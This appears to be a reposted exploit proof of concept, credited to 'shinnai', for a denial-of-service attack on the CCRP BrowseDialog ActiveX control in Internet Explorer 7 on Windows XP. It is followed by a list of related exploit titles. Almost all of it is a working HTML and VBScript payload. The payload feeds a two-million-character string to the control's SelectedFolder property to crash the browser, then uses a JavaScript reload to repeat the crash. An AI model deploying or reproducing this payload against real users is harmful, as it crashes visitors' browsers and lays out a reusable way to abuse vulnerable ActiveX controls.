<!--
-----------------------------------------------------------------------------------------------------------
BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------------------------------------
-->
<html>
<object classid='clsid:19E6E148-BAEC-11D2-B03A-EAFC20524153' id='CCRP_BDc'></object>
<script language='vbscript'> argCount = 1 arg1=String(2000000, "A") CCRP_BDc.SelectedFolder = arg1
</script> <script language='javascript'>
document.location.reload()
</script>//http://www.leftworld.net
【BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service】相关文章:
★ Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit
★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit
★ BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)
★ The Personal FTP Server 6.0f RETR Denial of Service Exploit
★ VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability
★ webEdition CMS (we_objectID) Blind SQL Injection Exploit
★ Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit
★ MS Windows (.doc File) Malformed Pointers Denial of Service Exploit
★ Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit
★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit